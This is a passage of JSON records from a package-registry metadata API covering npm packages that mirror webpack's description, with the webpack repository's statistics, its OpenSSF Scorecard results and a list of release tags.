14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":428,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":87,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":53,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@yck-web%2Fwebpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@yck-web%2Fwebpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@yck-web%2Fwebpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@yck-web%2Fwebpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@yck-web%2Fwebpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@yck-web%2Fwebpack/codemeta","maintainers":[{"uuid":"yck123","login":"yck123","name":null,"email":"760251473@qq.com","url":null,"packages_count":23,"html_url":"https://www.npmjs.com/~yck123","role":null,"created_at":"2022-11-11T06:28:45.897Z","updated_at":"2022-11-11T06:28:45.897Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/yck123/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1220684,"name":"my-webpack","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jade, coffee, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":["my-webpack","webpack"],"namespace":null,"versions_count":1,"first_release_published_at":"2016-01-05T02:28:32.069Z","latest_release_published_at":"2016-01-05T02:28:32.069Z","latest_release_number":"0.0.1","last_synced_at":"2026-09-03T01:10:46.173Z","created_at":"2022-04-08T14:02:50.016Z","updated_at":"2026-09-03T01:10:46.174Z","registry_url":"https://www.npmjs.com/package/my-webpack","install_command":"npm install my-webpack","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"0.0.1"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-29T15:08:44.000Z","size":97455,"stargazers_count":65964,"open_issues_count":135,"forks_count":9523,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-29T15:15:16.900Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-29T14:54:50.000Z","dependencies_parsed_at":"2026-08-29T15:24:21.824Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":672,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36974490,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.110.1","sha":"0b2952e15bb1aa9a198acbbfdcb9a0dc1aabb5af","kind":"commit","published_at":"2026-08-27T20:00:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1/manifests"},{"name":"v5.110.0","sha":"3a7c0e6e27f90f9c5e407c18506a5034aabcf27d","kind":"commit","published_at":"2026-08-27T11:27:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0/manifests"},{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/G